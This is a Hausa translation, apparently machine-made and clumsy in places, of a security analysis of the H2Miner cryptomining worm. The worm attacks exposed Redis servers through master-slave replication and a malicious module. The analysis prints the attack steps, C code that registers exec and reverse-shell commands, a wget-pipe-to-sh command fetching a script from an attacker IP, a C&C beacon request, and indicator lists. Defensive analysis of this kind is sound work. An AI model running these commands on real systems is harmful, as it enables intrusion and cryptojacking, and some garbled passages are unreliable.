Kwana daya da ta wuce, daya daga cikin sabar aikina ta sami hari da irin wannan tsutsa. A cikin neman amsar tambayar "menene hakan?" Na sami babban labari ta ƙungiyar Tsaro ta Alibaba Cloud Security. Tun da ban sami wannan labarin akan Habré ba, na yanke shawarar fassara shi musamman a gare ku <3
Gabatarwa
Kwanan nan, ƙungiyar tsaro ta Alibaba Cloud ta gano fashewar H2Miner kwatsam. Wannan nau'in tsutsa mai lalata yana amfani da rashin izini ko kalmomin sirri masu rauni don Redis a matsayin ƙofofin zuwa tsarin ku, bayan haka yana aiki tare da nasa qeta tsarin tare da bawa ta hanyar aiki tare na master-bawa kuma a ƙarshe zazzage wannan ma'aunin ɓarna zuwa injin da aka kai harin kuma yana aiwatar da mugunta. umarnin.
A baya, ana kai hare-hare akan tsarin ku ta hanyar amfani da hanyar da ta ƙunshi ayyuka da aka tsara ko maɓallan SSH waɗanda aka rubuta zuwa na'urar ku bayan maharin ya shiga Redis. Abin farin ciki, wannan hanya ba za a iya amfani da shi sau da yawa saboda matsaloli tare da ikon sarrafa izini ko saboda nau'ikan tsarin daban-daban. Koyaya, wannan hanyar loda ma'auni na mugunta na iya aiwatar da umarnin maharin kai tsaye ko samun damar shiga harsashi, wanda ke da haɗari ga tsarin ku.
Saboda yawan sabobin Redis da aka yi a Intanet (kusan miliyan 1), ƙungiyar tsaro ta Alibaba Cloud, a matsayin tunatarwa ta abokantaka, ta ba da shawarar cewa masu amfani da su kada su raba Redis akan layi kuma a kai a kai suna bincika ƙarfin kalmomin shiga da kuma ko an lalata su. zaɓi mai sauri.
H2 Miner
H2Miner botnet ne mai ma'adinai don tsarin tushen Linux wanda zai iya mamaye tsarin ku ta hanyoyi daban-daban, gami da rashin izini a cikin Hadoop yarn, Docker, da raunin umarnin Redis Redis (RCE). Botnet yana aiki ta hanyar zazzage rubutun ƙeta da malware don ma'adinin bayanan ku, faɗaɗa harin a kwance, da kiyaye umarni da sarrafawa (C&C) sadarwa.
Farashin RCE
Ilimi game da wannan batu an raba shi ta hanyar Pavel Toporkov a ZeroNights 2018. Bayan sigar 4.0, Redis yana goyan bayan fasalin ɗorawa na toshe wanda ke ba masu amfani damar ɗaukar nauyi don haka fayilolin da aka haɗa tare da C cikin Redis don aiwatar da takamaiman umarnin Redis. Wannan aikin, kodayake yana da amfani, yana ƙunshe da rauni a cikinsa, a cikin yanayin bawa-bawa, ana iya daidaita fayiloli tare da bawa ta yanayin cikakken resync. Wannan maharin na iya amfani da shi don canja wurin fayiloli masu ɓarna. Bayan an gama canja wurin, maharan sun ɗora samfurin a kan misalin Redis da aka kai harin kuma suna aiwatar da kowane umarni.
Binciken tsutsa na Malware
Kwanan nan, ƙungiyar tsaro ta Alibaba Cloud ta gano cewa girman ƙungiyar masu hakar ma'adinai na H2Miner ya karu ba zato ba tsammani. Bisa ga binciken, tsarin gaba ɗaya na faruwar harin shine kamar haka:
H2Miner yana amfani da RCE Redis don cikakken hari. Mahara sun fara kai hari kan sabar Redis mara tsaro ko sabar da ke da raunin kalmomin shiga.
Sannan suna amfani da umarnin config set dbfilename red2.so don canza sunan fayil. Bayan wannan, maharan suna aiwatar da umarnin slaveof don saita adireshin mai masaukin baki-bawa.
Lokacin da misalin Redis da aka kai hari ya kafa haɗin kai-bawa tare da qeta Redis wanda maharin ke da shi, maharin ya aika da cutar ta hanyar amfani da cikakken umarnin daidaita fayilolin. Za a sauke fayil ɗin red2.so zuwa injin da aka kai harin. Maharan daga nan sai su yi amfani da ./red2.so loading module don loda wannan fayil ɗin. Tsarin na iya aiwatar da umarni daga maharin ko fara haɗin baya (kofar baya) don samun dama ga injin da aka kai harin.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Bayan aiwatar da mummunan umarni kamar / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, maharin zai sake saita sunan fayil ɗin ajiyar kuma ya sauke tsarin tsarin don tsaftace alamun. Koyaya, fayil ɗin red2.so zai ci gaba da kasancewa a kan injin ɗin da aka kai harin. An shawarci masu amfani da su kula da kasancewar irin wannan fayil ɗin da ake tuhuma a cikin babban fayil ɗin misalin su Redis.
Baya ga kashe wasu munanan matakai don satar albarkatu, maharin ya bi mugun rubutun ta hanyar zazzagewa da aiwatar da fayiloli na binary zuwa ga. . Wannan yana nufin cewa sunan tsari ko sunan littafin da ke ƙunshe da dangin dangi na iya nuna cewa wannan na'ura ta kamu da wannan ƙwayar cuta.
Dangane da sakamakon aikin injiniya na baya, malware yana aiwatar da ayyuka masu zuwa:
- Ana loda fayiloli da aiwatar da su
- Ma'adinai
- Kula da sadarwar C&C da aiwatar da umarnin maharan
Yi amfani da masscan don dubawa na waje don faɗaɗa tasirin ku. Bugu da ƙari, adireshin IP na uwar garken C&C yana da ƙarfi a cikin shirin, kuma wanda aka kai harin zai sadarwa tare da uwar garken sadarwar C&C ta amfani da buƙatun HTTP, inda aka gano bayanan zombie (sabar da ba ta dace ba) a cikin taken HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Sauran hanyoyin kai hari
Adireshi da hanyoyin haɗin da tsutsa ke amfani da su
/jinin
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tip
Na farko, Redis bai kamata ya kasance mai isa ga Intanet ba kuma ya kamata a kiyaye shi tare da kalmar sirri mai ƙarfi. Hakanan yana da mahimmanci abokan ciniki su duba cewa babu fayil ɗin red2.so a cikin Redis directory kuma babu "kinsing" a cikin sunan fayil / tsari akan mai watsa shiri.
source: www.habr.com